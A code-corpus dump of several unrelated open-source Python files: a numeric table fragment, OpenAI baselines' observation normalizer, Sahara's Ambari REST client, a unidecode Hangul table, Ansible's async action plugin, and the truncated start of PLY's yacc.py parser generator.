12711,12712,12713,12714,12715,12716,12717,12718,12719,12720,12721,12722,12723,12724,12725,12726, #12688
12727,12728,12729,12730,12731,12732,12733,12734,12735,12736,12737,12738,12739,12740,12741,12742, #12704
12743,12744,12745,12746,12747,12748,12749,12750,12751,12752,12753,12754,12755,12756,12757,12758, #12720
12759,12760,12761,12762,12763,12764,12765,12766,12767,12768,12769,12770,12771,12772,12773,12774, #12736
12775,12776,12777,12778,4993,2175,12779,12780,12781,12782,12783,12784,12785,12786,4500,12787, #12752
12788,12789,12790,12791,12792,12793,12794,12795,12796,12797,12798,12799,12800,12801,12802,12803, #12768
12804,12805,12806,12807,12808,12809,12810,12811,12812,12813,12814,12815,12816,12817,12818,12819, #12784
12820,12821,12822,12823,12824,12825,12826,4198,3967,12827,12828,12829,12830,12831,12832,12833, #12800
12834,12835,12836,12837,12838,12839,12840,12841,12842,12843,12844,12845,12846,12847,12848,12849, #12816
12850,12851,12852,12853,12854,12855,12856,12857,12858,12859,12860,12861,4199,12862,12863,12864, #12832
12865,12866,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876,12877,12878,12879,12880, #12848
12881,12882,12883,12884,12885,12886,12887,4501,12888,12889,12890,12891,12892,12893,12894,12895, #12864
12896,12897,12898,12899,12900,12901,12902,12903,12904,12905,12906,12907,12908,12909,12910,12911, #12880
12912,4994,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925,12926, #12896
12927,12928,12929,12930,12931,12932,12933,12934,12935,12936,12937,12938,12939,12940,12941,12942, #12912
12943,12944,12945,12946,12947,12948,12949,12950,12951,12952,12953,12954,12955,12956,1772,12957, #12928
12958,12959,12960,12961,12962,12963,12964,12965,12966,12967,12968,12969,12970,12971,12972,12973, #12944
12974,12975,12976,12977,12978,12979,12980,12981,12982,12983,12984,12985,12986,12987,12988,12989, #12960
12990,12991,12992,12993,12994,12995,12996,12997,4502,12998,4503,12999,13000,13001,13002,13003, #12976
4504,13004,13005,13006,13007,13008,13009,13010,13011,13012,13013,13014,13015,13016,13017,13018, #12992
13019,13020,13021,13022,13023,13024,13025,13026,13027,13028,13029,3449,13030,13031,13032,13033, #13008
13034,13035,13036,13037,13038,13039,13040,13041,13042,13043,13044,13045,13046,13047,13048,13049, #13024
13050,13051,13052,13053,13054,13055,13056,13057,13058,13059,13060,13061,13062,13063,13064,13065, #13040
13066,13067,13068,13069,13070,13071,13072,13073,13074,13075,13076,13077,13078,13079,13080,13081, #13056
13082,13083,13084,13085,13086,13087,13088,13089,13090,13091,13092,13093,13094,13095,13096,13097, #13072
13098,13099,13100,13101,13102,13103,13104,13105,13106,13107,13108,13109,13110,13111,13112,13113, #13088
13114,13115,13116,13117,13118,3968,13119,4995,13120,13121,13122,13123,13124,13125,13126,13127, #13104
4505,13128,13129,13130,13131,13132,13133,13134,4996,4506,13135,13136,13137,13138,13139,4997, #13120
13140,13141,13142,13143,13144,13145,13146,13147,13148,13149,13150,13151,13152,13153,13154,13155, #13136
13156,13157,13158,13159,4998,13160,13161,13162,13163,13164,13165,13166,13167,13168,13169,13170, #13152
13171,13172,13173,13174,13175,13176,4999,13177,13178,13179,13180,13181,13182,13183,13184,13185, #13168
13186,13187,13188,13189,13190,13191,13192,13193,13194,13195,13196,13197,13198,13199,13200,13201, #13184
13202,13203,13204,13205,13206,5000,13207,13208,13209,13210,13211,13212,13213,13214,13215,13216, #13200
13217,13218,13219,13220,13221,13222,13223,13224,13225,13226,13227,4200,5001,13228,13229,13230, #13216
13231,13232,13233,13234,13235,13236,13237,13238,13239,13240,3969,13241,13242,13243,13244,3970, #13232
13245,13246,13247,13248,13249,13250,13251,13252,13253,13254,13255,13256,13257,13258,13259,13260, #13248
13261,13262,13263,13264,13265,13266,13267,13268,3450,13269,13270,13271,13272,13273,13274,13275, #13264
13276,5002,13277,13278,13279,13280,13281,13282,13283,13284,13285,13286,13287,13288,13289,13290, #13280
13291,13292,13293,13294,13295,13296,13297,13298,13299,13300,13301,13302,3813,13303,13304,13305, #13296
13306,13307,13308,13309,13310,13311,13312,13313,13314,13315,13316,13317,13318,13319,13320,13321, #13312
13322,13323,13324,13325,13326,13327,13328,4507,13329,13330,13331,13332,13333,13334,13335,13336, #13328
13337,13338,13339,13340,13341,5003,13342,13343,13344,13345,13346,13347,13348,13349,13350,13351, #13344
13352,13353,13354,13355,13356,13357,13358,13359,13360,13361,13362,13363,13364,13365,13366,13367, #13360
5004,13368,13369,13370,13371,13372,13373,13374,13375,13376,13377,13378,13379,13380,13381,13382, #13376
13383,13384,13385,13386,13387,13388,13389,13390,13391,13392,13393,13394,13395,13396,13397,13398, #13392
13399,13400,13401,13402,13403,13404,13405,13406,13407,13408,13409,13410,13411,13412,13413,13414, #13408
13415,13416,13417,13418,13419,13420,13421,13422,13423,13424,13425,13426,13427,13428,13429,13430, #13424
13431,13432,4508,13433,13434,13435,4201,13436,13437,13438,13439,13440,13441,13442,13443,13444, #13440
13445,13446,13447,13448,13449,13450,13451,13452,13453,13454,13455,13456,13457,5005,13458,13459, #13456
13460,13461,13462,13463,13464,13465,13466,13467,13468,13469,13470,4509,13471,13472,13473,13474, #13472
13475,13476,13477,13478,13479,13480,13481,13482,13483,13484,13485,13486,13487,13488,13489,13490, #13488
13491,13492,13493,13494,13495,13496,13497,13498,13499,13500,13501,13502,13503,13504,13505,13506, #13504
13507,13508,13509,13510,13511,13512,13513,13514,13515,13516,13517,13518,13519,13520,13521,13522, #13520
13523,13524,13525,13526,13527,13528,13529,13530,13531,13532,13533,13534,13535,13536,13537,13538, #13536
13539,13540,13541,13542,13543,13544,13545,13546,13547,13548,13549,13550,13551,13552,13553,13554, #13552
13555,13556,13557,13558,13559,13560,13561,13562,13563,13564,13565,13566,13567,13568,13569,13570, #13568
13571,13572,13573,13574,13575,13576,13577,13578,13579,13580,13581,13582,13583,13584,13585,13586, #13584
13587,13588,13589,13590,13591,13592,13593,13594,13595,13596,13597,13598,13599,13600,13601,13602, #13600
13603,13604,13605,13606,13607,13608,13609,13610,13611,13612,13613,13614,13615,13616,13617,13618, #13616
13619,13620,13621,13622,13623,13624,13625,13626,13627,13628,13629,13630,13631,13632,13633,13634, #13632
13635,13636,13637,13638,13639,13640,13641,13642,5006,13643,13644,13645,13646,13647,13648,13649, #13648
13650,13651,5007,13652,13653,13654,13655,13656,13657,13658,13659,13660,13661,13662,13663,13664, #13664
13665,13666,13667,13668,13669,13670,13671,13672,13673,13674,13675,13676,13677,13678,13679,13680, #13680
13681,13682,13683,13684,13685,13686,13687,13688,13689,13690,13691,13692,13693,13694,13695,13696, #13696
13697,13698,13699,13700,13701,13702,13703,13704,13705,13706,13707,13708,13709,13710,13711,13712, #13712
13713,13714,13715,13716,13717,13718,13719,13720,13721,13722,13723,13724,13725,13726,13727,13728, #13728
13729,13730,13731,13732,13733,13734,13735,13736,13737,13738,13739,13740,13741,13742,13743,13744, #13744
13745,13746,13747,13748,13749,13750,13751,13752,13753,13754,13755,13756,13757,13758,13759,13760, #13760
13761,13762,13763,13764,13765,13766,13767,13768,13769,13770,13771,13772,13773,13774,3273,13775, #13776
13776,13777,13778,13779,13780,13781,13782,13783,13784,13785,13786,13787,13788,13789,13790,13791, #13792
13792,13793,13794,13795,13796,13797,13798,13799,13800,13801,13802,13803,13804,13805,13806,13807, #13808
13808,13809,13810,13811,13812,13813,13814,13815,13816,13817,13818,13819,13820,13821,13822,13823, #13824
13824,13825,13826,13827,13828,13829,13830,13831,13832,13833,13834,13835,13836,13837,13838,13839, #13840
13840,13841,13842,13843,13844,13845,13846,13847,13848,13849,13850,13851,13852,13853,13854,13855, #13856
13856,13857,13858,13859,13860,13861,13862,13863,13864,13865,13866,13867,13868,13869,13870,13871, #13872
13872,13873,13874,13875,13876,13877,13878,13879,13880,13881,13882,13883,13884,13885,13886,13887, #13888
13888,13889,13890,13891,13892,13893,13894,13895,13896,13897,13898,13899,13900,13901,13902,13903, #13904
13904,13905,13906,13907,13908,13909,13910,13911,13912,13913,13914,13915,13916,13917,13918,13919, #13920
13920,13921,13922,13923,13924,13925,13926,13927,13928,13929,13930,13931,13932,13933,13934,13935, #13936
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa
| mit |
openai/baselines | baselines/her/normalizer.py | 1 | 5304 | import threading
import numpy as np
from mpi4py import MPI
import tensorflow as tf
from baselines.her.util import reshape_for_broadcasting
class Normalizer:
def __init__(self, size, eps=1e-2, default_clip_range=np.inf, sess=None):
"""A normalizer that ensures that observations are approximately distributed according to
a standard Normal distribution (i.e. have mean zero and variance one).
Args:
size (int): the size of the observation to be normalized
eps (float): a small constant that avoids underflows
default_clip_range (float): normalized observations are clipped to be in
[-default_clip_range, default_clip_range]
sess (object): the TensorFlow session to be used
"""
self.size = size
self.eps = eps
self.default_clip_range = default_clip_range
self.sess = sess if sess is not None else tf.get_default_session()
self.local_sum = np.zeros(self.size, np.float32)
self.local_sumsq = np.zeros(self.size, np.float32)
self.local_count = np.zeros(1, np.float32)
self.sum_tf = tf.get_variable(
initializer=tf.zeros_initializer(), shape=self.local_sum.shape, name='sum',
trainable=False, dtype=tf.float32)
self.sumsq_tf = tf.get_variable(
initializer=tf.zeros_initializer(), shape=self.local_sumsq.shape, name='sumsq',
trainable=False, dtype=tf.float32)
self.count_tf = tf.get_variable(
initializer=tf.ones_initializer(), shape=self.local_count.shape, name='count',
trainable=False, dtype=tf.float32)
self.mean = tf.get_variable(
initializer=tf.zeros_initializer(), shape=(self.size,), name='mean',
trainable=False, dtype=tf.float32)
self.std = tf.get_variable(
initializer=tf.ones_initializer(), shape=(self.size,), name='std',
trainable=False, dtype=tf.float32)
self.count_pl = tf.placeholder(name='count_pl', shape=(1,), dtype=tf.float32)
self.sum_pl = tf.placeholder(name='sum_pl', shape=(self.size,), dtype=tf.float32)
self.sumsq_pl = tf.placeholder(name='sumsq_pl', shape=(self.size,), dtype=tf.float32)
self.update_op = tf.group(
self.count_tf.assign_add(self.count_pl),
self.sum_tf.assign_add(self.sum_pl),
self.sumsq_tf.assign_add(self.sumsq_pl)
)
self.recompute_op = tf.group(
tf.assign(self.mean, self.sum_tf / self.count_tf),
tf.assign(self.std, tf.sqrt(tf.maximum(
tf.square(self.eps),
self.sumsq_tf / self.count_tf - tf.square(self.sum_tf / self.count_tf)
))),
)
self.lock = threading.Lock()
def update(self, v):
v = v.reshape(-1, self.size)
with self.lock:
self.local_sum += v.sum(axis=0)
self.local_sumsq += (np.square(v)).sum(axis=0)
self.local_count[0] += v.shape[0]
def normalize(self, v, clip_range=None):
if clip_range is None:
clip_range = self.default_clip_range
mean = reshape_for_broadcasting(self.mean, v)
std = reshape_for_broadcasting(self.std, v)
return tf.clip_by_value((v - mean) / std, -clip_range, clip_range)
def denormalize(self, v):
mean = reshape_for_broadcasting(self.mean, v)
std = reshape_for_broadcasting(self.std, v)
return mean + v * std
def _mpi_average(self, x):
buf = np.zeros_like(x)
MPI.COMM_WORLD.Allreduce(x, buf, op=MPI.SUM)
buf /= MPI.COMM_WORLD.Get_size()
return buf
def synchronize(self, local_sum, local_sumsq, local_count, root=None):
local_sum[...] = self._mpi_average(local_sum)
local_sumsq[...] = self._mpi_average(local_sumsq)
local_count[...] = self._mpi_average(local_count)
return local_sum, local_sumsq, local_count
def recompute_stats(self):
with self.lock:
# Copy over results.
local_count = self.local_count.copy()
local_sum = self.local_sum.copy()
local_sumsq = self.local_sumsq.copy()
# Reset.
self.local_count[...] = 0
self.local_sum[...] = 0
self.local_sumsq[...] = 0
# We perform the synchronization outside of the lock to keep the critical section as short
# as possible.
synced_sum, synced_sumsq, synced_count = self.synchronize(
local_sum=local_sum, local_sumsq=local_sumsq, local_count=local_count)
self.sess.run(self.update_op, feed_dict={
self.count_pl: synced_count,
self.sum_pl: synced_sum,
self.sumsq_pl: synced_sumsq,
})
self.sess.run(self.recompute_op)
class IdentityNormalizer:
def __init__(self, size, std=1.):
self.size = size
self.mean = tf.zeros(self.size, tf.float32)
self.std = std * tf.ones(self.size, tf.float32)
def update(self, x):
pass
def normalize(self, x, clip_range=None):
return x / self.std
def denormalize(self, x):
return self.std * x
def synchronize(self):
pass
def recompute_stats(self):
pass
| mit |
crobby/sahara | sahara/plugins/ambari/client.py | 2 | 4171 | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from requests import auth
class AmbariClient(object):
def __init__(self, instance, port="8080", **kwargs):
kwargs.setdefault("username", "admin")
kwargs.setdefault("password", "admin")
self._port = port
self._base_url = "http://{host}:{port}/api/v1".format(
host=instance.management_ip, port=port)
self._instance = instance
self._http_client = instance.remote().get_http_client(port)
self._headers = {"X-Requested-By": "sahara"}
self._auth = auth.HTTPBasicAuth(kwargs["username"], kwargs["password"])
self._default_client_args = {"verify": False, "auth": self._auth,
"headers": self._headers}
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self._instance.remote().close_http_session(self._port)
def get(self, *args, **kwargs):
kwargs.update(self._default_client_args)
return self._http_client.get(*args, **kwargs)
def post(self, *args, **kwargs):
kwargs.update(self._default_client_args)
return self._http_client.post(*args, **kwargs)
def put(self, *args, **kwargs):
kwargs.update(self._default_client_args)
return self._http_client.put(*args, **kwargs)
def delete(self, *args, **kwargs):
kwargs.update(self._default_client_args)
return self._http_client.delete(*args, **kwargs)
@staticmethod
def check_response(resp):
resp.raise_for_status()
if resp.text:
return jsonutils.loads(resp.text)
def get_registered_hosts(self):
url = self._base_url + "/hosts"
resp = self.get(url)
data = self.check_response(resp)
return data.get("items", [])
def get_host_info(self, host):
url = self._base_url + "/hosts/%s" % host
resp = self.get(url)
data = self.check_response(resp)
return data.get("Hosts", {})
def update_user_password(self, user, old_password, new_password):
url = self._base_url + "/users/%s" % user
data = jsonutils.dumps({
"Users": {
"old_password": old_password,
"password": new_password
}
})
resp = self.put(url, data=data)
self.check_response(resp)
def create_blueprint(self, name, data):
url = self._base_url + "/blueprints/%s" % name
resp = self.post(url, data=jsonutils.dumps(data))
self.check_response(resp)
def create_cluster(self, name, data):
url = self._base_url + "/clusters/%s" % name
resp = self.post(url, data=jsonutils.dumps(data))
return self.check_response(resp).get("Requests")
def check_request_status(self, cluster_name, req_id):
url = self._base_url + "/clusters/%s/requests/%d" % (cluster_name,
req_id)
resp = self.get(url)
return self.check_response(resp).get("Requests")
def set_up_mirror(self, stack_version, os_type, repo_id, repo_url):
url = self._base_url + (
"/stacks/HDP/versions/%s/operating_systems/%s/repositories/%s") % (
stack_version, os_type, repo_id)
data = {
"Repositories": {
"base_url": repo_url,
"verify_base_url": True
}
}
resp = self.put(url, data=jsonutils.dumps(data))
self.check_response(resp)
| apache-2.0 |
andris210296/andris-projeto | backend/venv/lib/python2.7/site-packages/unidecode/x0ca.py | 253 | 5007 | data = (
'jjael', # 0x00
'jjaelg', # 0x01
'jjaelm', # 0x02
'jjaelb', # 0x03
'jjaels', # 0x04
'jjaelt', # 0x05
'jjaelp', # 0x06
'jjaelh', # 0x07
'jjaem', # 0x08
'jjaeb', # 0x09
'jjaebs', # 0x0a
'jjaes', # 0x0b
'jjaess', # 0x0c
'jjaeng', # 0x0d
'jjaej', # 0x0e
'jjaec', # 0x0f
'jjaek', # 0x10
'jjaet', # 0x11
'jjaep', # 0x12
'jjaeh', # 0x13
'jjya', # 0x14
'jjyag', # 0x15
'jjyagg', # 0x16
'jjyags', # 0x17
'jjyan', # 0x18
'jjyanj', # 0x19
'jjyanh', # 0x1a
'jjyad', # 0x1b
'jjyal', # 0x1c
'jjyalg', # 0x1d
'jjyalm', # 0x1e
'jjyalb', # 0x1f
'jjyals', # 0x20
'jjyalt', # 0x21
'jjyalp', # 0x22
'jjyalh', # 0x23
'jjyam', # 0x24
'jjyab', # 0x25
'jjyabs', # 0x26
'jjyas', # 0x27
'jjyass', # 0x28
'jjyang', # 0x29
'jjyaj', # 0x2a
'jjyac', # 0x2b
'jjyak', # 0x2c
'jjyat', # 0x2d
'jjyap', # 0x2e
'jjyah', # 0x2f
'jjyae', # 0x30
'jjyaeg', # 0x31
'jjyaegg', # 0x32
'jjyaegs', # 0x33
'jjyaen', # 0x34
'jjyaenj', # 0x35
'jjyaenh', # 0x36
'jjyaed', # 0x37
'jjyael', # 0x38
'jjyaelg', # 0x39
'jjyaelm', # 0x3a
'jjyaelb', # 0x3b
'jjyaels', # 0x3c
'jjyaelt', # 0x3d
'jjyaelp', # 0x3e
'jjyaelh', # 0x3f
'jjyaem', # 0x40
'jjyaeb', # 0x41
'jjyaebs', # 0x42
'jjyaes', # 0x43
'jjyaess', # 0x44
'jjyaeng', # 0x45
'jjyaej', # 0x46
'jjyaec', # 0x47
'jjyaek', # 0x48
'jjyaet', # 0x49
'jjyaep', # 0x4a
'jjyaeh', # 0x4b
'jjeo', # 0x4c
'jjeog', # 0x4d
'jjeogg', # 0x4e
'jjeogs', # 0x4f
'jjeon', # 0x50
'jjeonj', # 0x51
'jjeonh', # 0x52
'jjeod', # 0x53
'jjeol', # 0x54
'jjeolg', # 0x55
'jjeolm', # 0x56
'jjeolb', # 0x57
'jjeols', # 0x58
'jjeolt', # 0x59
'jjeolp', # 0x5a
'jjeolh', # 0x5b
'jjeom', # 0x5c
'jjeob', # 0x5d
'jjeobs', # 0x5e
'jjeos', # 0x5f
'jjeoss', # 0x60
'jjeong', # 0x61
'jjeoj', # 0x62
'jjeoc', # 0x63
'jjeok', # 0x64
'jjeot', # 0x65
'jjeop', # 0x66
'jjeoh', # 0x67
'jje', # 0x68
'jjeg', # 0x69
'jjegg', # 0x6a
'jjegs', # 0x6b
'jjen', # 0x6c
'jjenj', # 0x6d
'jjenh', # 0x6e
'jjed', # 0x6f
'jjel', # 0x70
'jjelg', # 0x71
'jjelm', # 0x72
'jjelb', # 0x73
'jjels', # 0x74
'jjelt', # 0x75
'jjelp', # 0x76
'jjelh', # 0x77
'jjem', # 0x78
'jjeb', # 0x79
'jjebs', # 0x7a
'jjes', # 0x7b
'jjess', # 0x7c
'jjeng', # 0x7d
'jjej', # 0x7e
'jjec', # 0x7f
'jjek', # 0x80
'jjet', # 0x81
'jjep', # 0x82
'jjeh', # 0x83
'jjyeo', # 0x84
'jjyeog', # 0x85
'jjyeogg', # 0x86
'jjyeogs', # 0x87
'jjyeon', # 0x88
'jjyeonj', # 0x89
'jjyeonh', # 0x8a
'jjyeod', # 0x8b
'jjyeol', # 0x8c
'jjyeolg', # 0x8d
'jjyeolm', # 0x8e
'jjyeolb', # 0x8f
'jjyeols', # 0x90
'jjyeolt', # 0x91
'jjyeolp', # 0x92
'jjyeolh', # 0x93
'jjyeom', # 0x94
'jjyeob', # 0x95
'jjyeobs', # 0x96
'jjyeos', # 0x97
'jjyeoss', # 0x98
'jjyeong', # 0x99
'jjyeoj', # 0x9a
'jjyeoc', # 0x9b
'jjyeok', # 0x9c
'jjyeot', # 0x9d
'jjyeop', # 0x9e
'jjyeoh', # 0x9f
'jjye', # 0xa0
'jjyeg', # 0xa1
'jjyegg', # 0xa2
'jjyegs', # 0xa3
'jjyen', # 0xa4
'jjyenj', # 0xa5
'jjyenh', # 0xa6
'jjyed', # 0xa7
'jjyel', # 0xa8
'jjyelg', # 0xa9
'jjyelm', # 0xaa
'jjyelb', # 0xab
'jjyels', # 0xac
'jjyelt', # 0xad
'jjyelp', # 0xae
'jjyelh', # 0xaf
'jjyem', # 0xb0
'jjyeb', # 0xb1
'jjyebs', # 0xb2
'jjyes', # 0xb3
'jjyess', # 0xb4
'jjyeng', # 0xb5
'jjyej', # 0xb6
'jjyec', # 0xb7
'jjyek', # 0xb8
'jjyet', # 0xb9
'jjyep', # 0xba
'jjyeh', # 0xbb
'jjo', # 0xbc
'jjog', # 0xbd
'jjogg', # 0xbe
'jjogs', # 0xbf
'jjon', # 0xc0
'jjonj', # 0xc1
'jjonh', # 0xc2
'jjod', # 0xc3
'jjol', # 0xc4
'jjolg', # 0xc5
'jjolm', # 0xc6
'jjolb', # 0xc7
'jjols', # 0xc8
'jjolt', # 0xc9
'jjolp', # 0xca
'jjolh', # 0xcb
'jjom', # 0xcc
'jjob', # 0xcd
'jjobs', # 0xce
'jjos', # 0xcf
'jjoss', # 0xd0
'jjong', # 0xd1
'jjoj', # 0xd2
'jjoc', # 0xd3
'jjok', # 0xd4
'jjot', # 0xd5
'jjop', # 0xd6
'jjoh', # 0xd7
'jjwa', # 0xd8
'jjwag', # 0xd9
'jjwagg', # 0xda
'jjwags', # 0xdb
'jjwan', # 0xdc
'jjwanj', # 0xdd
'jjwanh', # 0xde
'jjwad', # 0xdf
'jjwal', # 0xe0
'jjwalg', # 0xe1
'jjwalm', # 0xe2
'jjwalb', # 0xe3
'jjwals', # 0xe4
'jjwalt', # 0xe5
'jjwalp', # 0xe6
'jjwalh', # 0xe7
'jjwam', # 0xe8
'jjwab', # 0xe9
'jjwabs', # 0xea
'jjwas', # 0xeb
'jjwass', # 0xec
'jjwang', # 0xed
'jjwaj', # 0xee
'jjwac', # 0xef
'jjwak', # 0xf0
'jjwat', # 0xf1
'jjwap', # 0xf2
'jjwah', # 0xf3
'jjwae', # 0xf4
'jjwaeg', # 0xf5
'jjwaegg', # 0xf6
'jjwaegs', # 0xf7
'jjwaen', # 0xf8
'jjwaenj', # 0xf9
'jjwaenh', # 0xfa
'jjwaed', # 0xfb
'jjwael', # 0xfc
'jjwaelg', # 0xfd
'jjwaelm', # 0xfe
'jjwaelb', # 0xff
)
| mit |
garlandkr/ansible | lib/ansible/runner/action_plugins/async.py | 6 | 1940 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible.runner.return_data import ReturnData
class ActionModule(object):
def __init__(self, runner):
self.runner = runner
def run(self, conn, tmp, module_name, module_args, inject, complex_args=None, **kwargs):
''' transfer the given module name, plus the async module, then run it '''
if self.runner.noop_on_check(inject):
return ReturnData(conn=conn, comm_ok=True, result=dict(skipped=True, msg='check mode not supported for this module'))
# shell and command module are the same
if module_name == 'shell':
module_name = 'command'
module_args += " #USE_SHELL"
if tmp.find("tmp") == -1:
tmp = self.runner._make_tmp_path(conn)
(module_path, is_new_style, shebang) = self.runner._copy_module(conn, tmp, module_name, module_args, inject, complex_args=complex_args)
self.runner._low_level_exec_command(conn, "chmod a+rx %s" % module_path, tmp)
return self.runner._execute_module(conn, tmp, 'async_wrapper', module_args,
async_module=module_path,
async_jid=self.runner.generated_jid,
async_limit=self.runner.background,
inject=inject
)
| gpl-3.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/third_party/ply/yacc.py | 465 | 128492 | # -----------------------------------------------------------------------------
# ply: yacc.py
#
# Copyright (C) 2001-2011,
# David M. Beazley (Dabeaz LLC)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the David Beazley or Dabeaz LLC may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
#
# This implements an LR parser that is constructed from grammar rules defined
# as Python functions. The grammer is specified by supplying the BNF inside
# Python documentation strings. The inspiration for this technique was borrowed
# from John Aycock's Spark parsing system. PLY might be viewed as cross between
# Spark and the GNU bison utility.
#
# The current implementation is only somewhat object-oriented. The
# LR parser itself is defined in terms of an object (which allows multiple
# parsers to co-exist). However, most of the variables used during table
# construction are defined in terms of global variables. Users shouldn't
# notice unless they are trying to define multiple parsers at the same
# time using threads (in which case they should have their head examined).
#
# This implementation supports both SLR and LALR(1) parsing. LALR(1)
# support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu),
# using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles,
# Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced
# by the more efficient DeRemer and Pennello algorithm.
#
# :::::::: WARNING :::::::
#
# Construction of LR parsing tables is fairly complicated and expensive.
# To make this module run fast, a *LOT* of work has been put into
# optimization---often at the expensive of readability and what might
# consider to be good Python "coding style." Modify the code at your
# own risk!
# ----------------------------------------------------------------------------
__version__ = "3.4"
__tabversion__ = "3.2" # Table version
#-----------------------------------------------------------------------------
# === User configurable parameters ===
#
# Change these to modify the default behavior of yacc (if you wish)
#-----------------------------------------------------------------------------
yaccdebug = 1 # Debugging mode. If set, yacc generates a
# a 'parser.out' file in the current directory
debug_file = 'parser.out' # Default name of the debugging file
tab_module = 'parsetab' # Default name of the table module
default_lr = 'LALR' # Default LR table generation method
error_count = 3 # Number of symbols that must be shifted to leave recovery mode
yaccdevel = 0 # Set to True if developing yacc. This turns off optimized
# implementations of certain functions.
resultlimit = 40 # Size limit of results when running in debug mode.
pickle_protocol = 0 # Protocol to use when writing pickle files
import re, types, sys, os.path
# Compatibility function for python 2.6/3.0
if sys.version_info[0] < 3:
def func_code(f):
return f.func_code
else:
def func_code(f):
return f.__code__
# Compatibility
try:
MAXINT = sys.maxint
except AttributeError:
MAXINT = sys.maxsize
# Python 2.x/3.0 compatibility.
def load_ply_lex():
if sys.version_info[0] < 3:
import lex
else:
import ply.lex as lex
return lex
# This object is a stand-in for a logging object created by the
# logging module. PLY will use this by default to create things
# such as the parser.out file. If a user wants more detailed
# information, they can create their own logging object and pass
# it into PLY.
class PlyLogger(object):
def __init__(self,f):
self.f = f
def debug(self,msg,*args,**kwargs):
self.f.write((msg % args) + "\n")
info = debug
def warning(self,msg,*args,**kwargs):
self.f.write("WARNING: "+ (msg % args) + "\n")
def error(self,msg,*args,**kwargs):
self.f.write("ERROR: " + (msg % args) + "\n")
critical = debug
# Null logger is used when no output is generated. Does nothing.
class NullLogger(object):
def __getattribute__(self,name):
return self
def __call__(self,*args,**kwargs):
return self
# Exception raised for yacc-related errors
class YaccError(Exception): pass
# Format the result message that the parser produces when running in debug mode.
def format_result(r):
repr_str = repr(r)
if '\n' in repr_str: repr_str = repr(repr_str)
if len(repr_str) > resultlimit:
repr_str = repr_str[:resultlimit]+" ..."
result = "<%s @ 0x%x> (%s)" % (type(r).__name__,id(r),repr_str)
return result
# Format stack entries when the parser is running in debug mode
def format_stack_entry(r):
repr_str = repr(r)
if '\n' in repr_str: repr_str = repr(repr_str)
if len(repr_str) < 16:
return repr_str
else:
return "<%s @ 0x%x>" % (type(r).__name__,id(r))
#-----------------------------------------------------------------------------
# === LR Parsing Engine ===
#
# The following classes are used for the LR parser itself. These are not
# used during table construction and are independent of the actual LR
# table generation algorithm
#-----------------------------------------------------------------------------
# This class is used to hold non-terminal grammar symbols during parsing.
# It normally has the following attributes set:
# .type = Grammar symbol type
# .value = Symbol value
# .lineno = Starting line number
# .endlineno = Ending line number (optional, set automatically)
# .lexpos = Starting lex position
# .endlexpos = Ending lex position (optional, set automatically)
class YaccSymbol:
def __str__(self): return self.type
def __repr__(self): return str(self)
# This class is a wrapper around the objects actually passed to each
# grammar rule. Index lookup and assignment actually assign the
# .value attribute of the underlying YaccSymbol object.
# The lineno() method returns the line number of a given
# item (or 0 if not defined). The linespan() method returns
# a tuple of (startline,endline) representing the range of lines
# for a symbol. The lexspan() method returns a tuple (lexpos,endlexpos)
# representing the range of positional information for a symbol.
class YaccProduction:
def __init__(self,s,stack=None):
self.slice = s
self.stack = stack
self.lexer = None
self.parser= None
def __getitem__(self,n):
if n >= 0: return self.slice[n].value
else: return self.stack[n].value
def __setitem__(self,n,v):
self.slice[n].value = v
def __getslice__(self,i,j):
return [s.value for s in self.slice[i:j]]
def __len__(self):
return len(self.slice)
